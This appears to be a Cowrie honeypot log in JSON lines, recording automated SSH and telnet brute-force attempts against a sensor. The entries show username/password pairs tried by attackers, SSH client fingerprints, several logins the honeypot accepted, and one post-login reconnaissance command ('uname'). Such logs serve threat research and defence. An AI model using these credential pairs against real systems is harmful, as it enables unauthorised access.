{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:40.214507Z","src_ip":"217.154.1.158","session":"e1db2eedd3d3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:41.231082Z","src_ip":"217.154.1.158","session":"e1db2eedd3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51170,"dst_ip":"1.2.3.4","dst_port":22,"session":"20a9cb10606a","protocol":"ssh","message":"New connection: 212.227.125.160:51170 (1.2.3.4:22) [session: 20a9cb10606a]","sensor":"my-vps","timestamp":"2025-08-26T20:26:51.511764Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:51.732578Z","src_ip":"212.227.125.160","session":"20a9cb10606a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44542,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbe9c06e4753","protocol":"ssh","message":"New connection: 217.154.1.158:44542 (1.2.3.4:22) [session: bbe9c06e4753]","sensor":"my-vps","timestamp":"2025-08-26T20:26:57.277765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:26:57.279237Z","src_ip":"217.154.1.158","session":"bbe9c06e4753"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:26:57.294890Z","src_ip":"217.154.1.158","session":"bbe9c06e4753"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-26T20:26:57.353419Z","src_ip":"217.154.1.158","session":"bbe9c06e4753"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:58.370215Z","src_ip":"217.154.1.158","session":"bbe9c06e4753"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:26:58.894789Z","src_ip":"212.227.125.160","session":"66ee61ac76de"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60964,"dst_ip":"1.2.3.4","dst_port":22,"session":"089c33c143bd","protocol":"ssh","message":"New connection: 217.154.1.158:60964 (1.2.3.4:22) [session: 089c33c143bd]","sensor":"my-vps","timestamp":"2025-08-26T20:27:14.172111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:27:14.173012Z","src_ip":"217.154.1.158","session":"089c33c143bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:27:14.193527Z","src_ip":"217.154.1.158","session":"089c33c143bd"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:27:14.252814Z","src_ip":"217.154.1.158","session":"089c33c143bd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:27:15.269230Z","src_ip":"217.154.1.158","session":"089c33c143bd"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":56344,"dst_ip":"1.2.3.4","dst_port":23,"session":"73c4f742d890","protocol":"telnet","message":"New connection: 79.124.8.120:56344 (1.2.3.4:23) [session: 73c4f742d890]","sensor":"my-vps","timestamp":"2025-08-26T20:27:17.071615Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:27:17.111485Z","src_ip":"79.124.8.120","session":"73c4f742d890"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:27:17.131937Z","src_ip":"79.124.8.120","session":"73c4f742d890"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35598,"dst_ip":"1.2.3.4","dst_port":22,"session":"2943311a2199","protocol":"ssh","message":"New connection: 217.154.1.158:35598 (1.2.3.4:22) [session: 2943311a2199]","sensor":"my-vps","timestamp":"2025-08-26T20:27:31.199340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:27:31.200491Z","src_ip":"217.154.1.158","session":"2943311a2199"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:27:31.215075Z","src_ip":"217.154.1.158","session":"2943311a2199"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:27:31.259223Z","src_ip":"217.154.1.158","session":"2943311a2199"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:27:32.277400Z","src_ip":"217.154.1.158","session":"2943311a2199"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53914,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b2a20aebe06","protocol":"ssh","message":"New connection: 217.154.1.158:53914 (1.2.3.4:22) [session: 6b2a20aebe06]","sensor":"my-vps","timestamp":"2025-08-26T20:27:48.180324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:27:48.181286Z","src_ip":"217.154.1.158","session":"6b2a20aebe06"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:27:48.195308Z","src_ip":"217.154.1.158","session":"6b2a20aebe06"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-26T20:27:48.238919Z","src_ip":"217.154.1.158","session":"6b2a20aebe06"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:27:49.254912Z","src_ip":"217.154.1.158","session":"6b2a20aebe06"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39478,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1cbfc727fa0","protocol":"ssh","message":"New connection: 217.154.1.158:39478 (1.2.3.4:22) [session: f1cbfc727fa0]","sensor":"my-vps","timestamp":"2025-08-26T20:28:05.360439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:05.361557Z","src_ip":"217.154.1.158","session":"f1cbfc727fa0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:28:05.375699Z","src_ip":"217.154.1.158","session":"f1cbfc727fa0"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:28:05.430854Z","src_ip":"217.154.1.158","session":"f1cbfc727fa0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:06.447393Z","src_ip":"217.154.1.158","session":"f1cbfc727fa0"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43872,"dst_ip":"1.2.3.4","dst_port":22,"session":"86836cf6e60e","protocol":"ssh","message":"New connection: 217.154.1.158:43872 (1.2.3.4:22) [session: 86836cf6e60e]","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.484381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.485375Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.500003Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.542866Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:28:22.650149Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.651002Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.666147Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:22.667457Z","src_ip":"217.154.1.158","session":"86836cf6e60e"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":44572,"dst_ip":"1.2.3.4","dst_port":22,"session":"966bad2c94f7","protocol":"ssh","message":"New connection: 45.88.8.186:44572 (1.2.3.4:22) [session: 966bad2c94f7]","sensor":"my-vps","timestamp":"2025-08-26T20:28:23.060980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:23.631599Z","src_ip":"45.88.8.186","session":"966bad2c94f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:28:23.632275Z","src_ip":"45.88.8.186","session":"966bad2c94f7"}
{"eventid":"cowrie.login.success","username":"root","password":"reza-RM1234","message":"login attempt [root/reza-RM1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:28:26.490278Z","src_ip":"45.88.8.186","session":"966bad2c94f7"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:28.105919Z","src_ip":"45.88.8.186","session":"966bad2c94f7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39940,"dst_ip":"1.2.3.4","dst_port":22,"session":"417f0a6b054d","protocol":"ssh","message":"New connection: 217.154.1.158:39940 (1.2.3.4:22) [session: 417f0a6b054d]","sensor":"my-vps","timestamp":"2025-08-26T20:28:39.665452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:39.666544Z","src_ip":"217.154.1.158","session":"417f0a6b054d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:28:39.681195Z","src_ip":"217.154.1.158","session":"417f0a6b054d"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-26T20:28:39.732986Z","src_ip":"217.154.1.158","session":"417f0a6b054d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:40.750889Z","src_ip":"217.154.1.158","session":"417f0a6b054d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36914,"dst_ip":"1.2.3.4","dst_port":22,"session":"a284076f5562","protocol":"ssh","message":"New connection: 212.227.235.229:36914 (1.2.3.4:22) [session: a284076f5562]","sensor":"my-vps","timestamp":"2025-08-26T20:28:42.107529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:43.676296Z","src_ip":"212.227.235.229","session":"a284076f5562"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:28:43.677088Z","src_ip":"212.227.235.229","session":"a284076f5562"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47506,"dst_ip":"1.2.3.4","dst_port":22,"session":"83c90ad4bfab","protocol":"ssh","message":"New connection: 212.227.125.160:47506 (1.2.3.4:22) [session: 83c90ad4bfab]","sensor":"my-vps","timestamp":"2025-08-26T20:28:44.472689Z"}
